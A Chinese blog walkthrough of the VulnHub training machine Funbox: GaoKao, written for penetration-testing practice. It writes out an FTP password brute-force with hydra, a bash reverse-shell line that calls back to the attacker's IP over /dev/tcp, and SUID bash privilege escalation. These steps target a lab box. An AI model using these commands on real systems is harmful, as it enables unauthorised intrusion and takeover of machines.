vulnhub Funbox: GaoKao(funbox9)

最新推荐文章于 2022-09-17 14:16:26 发布
最新推荐文章于 2022-09-17 14:16:26 发布
阅读量901 收藏 1
点赞数 1
分类专栏: vulnhub 文章标签: bash ftp gobuster hydra suid
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/124051330
版权

渗透思路:

nmap扫描----ftp匿名访问获取可能的用户名----hydra爆破ftp密码----ftp上传反弹shell,等定时任务执行获得shell----bash suid提权

环境信息:

靶机:192.168.101.54

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.54

扫描到21端口(ftp,并且可以匿名登录)、22端口(ssh)、80端口(http)、3306端口(mysql)

2、匿名访问ftp

先看看ftp里面有啥有用的信息。

浏览器访问ftp://192.168.101.54/,看到有一个welcome.msg,下载下来发现就是命令行登录ftp时候的欢迎语

欢迎语里面有个email,sky@funbox9,其中sky有可能是用户名

3、gobuster扫描(没啥用)

浏览器登录http://192.168.101.54,发现是个包含靶机介绍的apache默认页面

尝试扫描网站目录

​gobuster dir -u http://192.168.101.54/ -w /usr/share/wordlists/dirb/big.txt

啥也没扫出来

4、hydra爆破ftp密码

ssh爆破半天没爆出来sky的密码,转而试试ftp密码爆破

hydra -l sky -P "/usr/share/wordlists/metasploit/unix_passwords.txt" ftp://192.168.101.54

sky用户的ftp密码是thebest

5、ftp上传反弹shell,等待定时任务执行获得shell

以用户名sky密码thebest登录靶机ftp

ls查看当前目录下文件,发现有个user.flag文件。

get user.flag

下载user.flag到攻击机。

在攻击机上查看user.flag的内容,发现似乎是个shell脚本。

结合上图中sky用户对user.flag有写和执行的权限,如果可以修改该文件内容为反弹shell,然后上传到靶机上覆盖原来的文件,并执行,就可以获得靶机shell。

网上找了一圈没发现用ftp执行shell脚本的方法,那就只能祈祷执行user.flag是个定时任务了。

在攻击机上修改user.flag的内容

echo "bash -c 'exec bash -i &>/dev/tcp/192.168.101.34/6666 <&1'" >> user.flag

攻击机上nc监听6666端口

nc -nlvp 6666

上传攻击机上的user.flag到靶机并覆盖靶机上原来的user.flag文件

put user.flag

文件上传成功后,攻击机上很快就得到了靶机sarah用户的shell

6、bash suid提权

这个靶机提权太简单了

检查有suid的命令

find / -user root -perm /4000 2>/dev/null

发现其中包含/bin/bash

输入以下命令提权

bash -p

在/root/目录下找到root.flag

6fb9c4307ec13a237ce41f5047cc6f11.png

仙女象
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
funbox:测试和工具程序
02-11
9. **文档生成**:项目可能包含文档生成工具,如Doxygen,它可以从源代码中自动生成文档,方便其他开发者理解和使用项目。 10. **持续集成/持续部署(CI/CD)**:"funbox"可能利用Jenkins、Travis CI等服务实现持续...
Vulnhub-FUNBOX: GAOKAO渗透
最新发布
laoyanCZ的博客
01-25 1024
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
靶机渗透练习30-Funbox9-GaoKao
hirak0的博客
04-18 862
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-gaokao,707/ Description It’s a box for beginners, but not easy. Gather careful !!! Hint: Don’t waste your time ! Every BruteForce-Attack at all ports can be stopped after 1500 trys per account. Enjoy the game
Vulnhub日记(一):FunboxGaoKao
Dawn_Xi的博客
08-03 473
靶机介绍 FunBox.GaoKao 是作者为初学者设计的机器。这台机器需要一点暴力破解和一些FTP协议的知识。“Funbox Gaokao Walkthrough – Vulnhub – Writeup” 主要参考Krishna Upadhyay的WriteUp所写 虚拟机链接:https://www.vulnhub.com/entry/funbox-gaokao,707/ 开始练习 使用Nmap找到靶机ip:192.168.56.101 本机ip:192.168.56.102 nm.
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox9(GaoKao
Aluxian_的博客
09-17 1043
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。FunBox系列第九个靶机了 这个靶机比较简单1.信息收集 获取ip地址 和端口信息2.hydra暴力破解 (工具的基本使用)3.bash的反弹shell(主要是记住回弹命令)3.bash suid提权(第一次使用挺简单的)这是这个系列第八个靶机啦比较简单 希望对刚入门得小白有帮助!
VulnHub渗透测试实战靶场 - Funbox: GaoKao
LYJ20010728的博客
08-28 998
VulnHub渗透测试实战靶场 - Funbox: GaoKao题目描述环境下载Funbox: Lunchbreaker靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 题目描述 It's a box for beginners, but not easy. Gather careful !!! Hint: Don't waste your time ! Every BruteForce-Attack at all ports can be stopped after 1500 trys per a
docker-funbox:具有有趣的终端命令和ASCII艺术的Docker容器
05-04
Docker Funbox 带有有趣怪异终端命令和ASCII艺术的容器。 特色 按字母顺序: 洛尔卡特 喵喵猫 管道 RIG-随机身份生成器 sl (不要与ls混淆) 洗手间 VLC S 基本用法 $ docker run --rm -it wernight/funbox _ ...
funbox_reactapp:测试
05-11
该项目是通过引导的。 您将在下面找到一些有关如何执行常见任务的信息。 您可以在找到本指南的最新版本。目录自动格式化代码更改页面<title>... 使用AJAX请求获取数据与API后端集成节点Ruby on Rails 在开发中...
funxbox-test:Funbox的测试任务
05-08
Funbox的测试任务 要启动它: npm安装 凉亭安装 吞咽 喝一口 gulp测试(用于测试) 通过在文本框中输入名称并按Enter,可以添加新的航点。 此后: 输入的路径点显示在已添加点列表的末尾; 标记会出现在地图...
中兴funbox固件b18版本
07-12
中兴funbox固件,b18,android 4.4
vulnhub-FunBox-wp
yutianovo的博客
08-08 507
靶机描述 Boot2Root ! This is a reallife szenario, but easy going. You have to enumerate and understand the szenario to get the root-flag in round about 20min. This VM is created/tested with Virtualbox. Maybe it works with vmware. If you need hints, call me o
FUNBOX-5靶机
小小猪的博客
06-30 336
FUNBOX-5靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.134 扫描靶机端口 访问80端口是默认的apache页面,扫描目录发现robots.txt文件,发现一个,但是试了发现没有,想到下载页面的提示,这里就没有深究 并不是目录 再次看扫描的目录 在之前的目录下拼上index.php发现是可以访问的,还有wp-content目录也是可以访问的,那么接下来就直接上神器wpscan扫描用户,至于wpscan的用法我前面有一篇
VulnHub渗透测试实战靶场 - FUNBOX: NEXT LEVEL
LYJ20010728的博客
08-27 379
VulnHub渗透测试实战靶场 - FUNBOX: NEXT LEVEL题目描述环境下载FUNBOX: NEXT LEVEL靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 题目描述 Lets separate the script-kids from script-teenies. Hint: The first impression is not always the right one! If you need hints, call me on twitter: @0815R2d2 Have
Funbox6靶机
小小猪的博客
06-30 325
Funbox6靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.133 扫描端口 使用ip访问web服务访问不了,显示域名,添加hosts文件 在/etc/hosts文件下添加域名 FUNBAO:GAMBLE HALL下面有个OPEN/CLOSED状态。只有在为OPEN状态的时候才能玩这个靶机,具体要等多久,我也不知道,反正就想等等(估计七八分钟左右的样子) 解密flag 获得用户名密码 登录上传大马,反弹shell 因在下手速
Vulnhub:FUNBOX-EASY靶机
logan_logan的博客
06-06 500
1.浏览器输入目标靶机地址打开网页; 2.端口扫描 nmap -p- 192.168.31.109 nmap -sC -sV -p 22,80,33060 192.168.31.109 3.目录枚举 扫出了好多目录,故意迷惑我们这些小可爱………… gobuster dir -u http://192.168.31.109/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html 4.在浏览器中打开/sto
Vulnhub:FUNBOX-EASYENUM靶机
logan_logan的博客
06-06 279
1.浏览器输入目标靶机IP地址浏览网页 2.端口扫描 nmap -p- 192.168.31.128 nmap -sC -sV -p 22,80 192.168.31.128 3.目录枚举 目录枚举的时候找到了一个有意思的mini.php目录 gobuster dir -u http://192.168.31.128 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html.txt 4.在浏览器打开min
VulnHub渗透测试实战靶场 - FUNBOX: CTF
LYJ20010728的博客
08-27 478
VulnHub渗透测试实战靶场 - FUNBOX: CTF题目描述环境下载FUNBOX: CTF靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 题目描述 Groundhog Day: Boot2Root ! Initial footstep is a bit flowed, but really not difficult. After getting access to Funbox: CTF, its nessesarry to find, read and understand the (2
vulnhub Funbox: Under Construction
小小猪的博客
09-13 636
切换用户登录,要升级shell模式,不然不可以切换用户。查看该文件,如果执行成功,会返回当前目录的文件。访问一下,发现是个oscommerce的网站。查看全局变量,查看执行文件都没发现可以利用。kali开启python服务,靶机进行下载。dirb扫描目录,发现catalog目录。查看版本的漏洞,发现命令执行漏洞。nmap进行探测靶机的服务和端口。发现一个base64语句。发现会执行一个脚本文件。进行解密,发现账号密码。查看目录下的flag。
VulnHub_FunBox
qq_45434762的博客
08-29 553
发现目标主机我们使用nmap扫描整个网段sudo nmap 192.168.1.0/24 扫描端口使用Nmap探测目标主机开放的端口,发现目标主机开放了,21,22,80端口sudo n...
FUNBOX: UNDER CONSTRUCTION!
08-16
- *1* *3* [vulnhub刷题记录(FUNBOX: UNDER CONSTRUCTION!)](https://blog.csdn.net/admin_gt/article/details/126722192)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值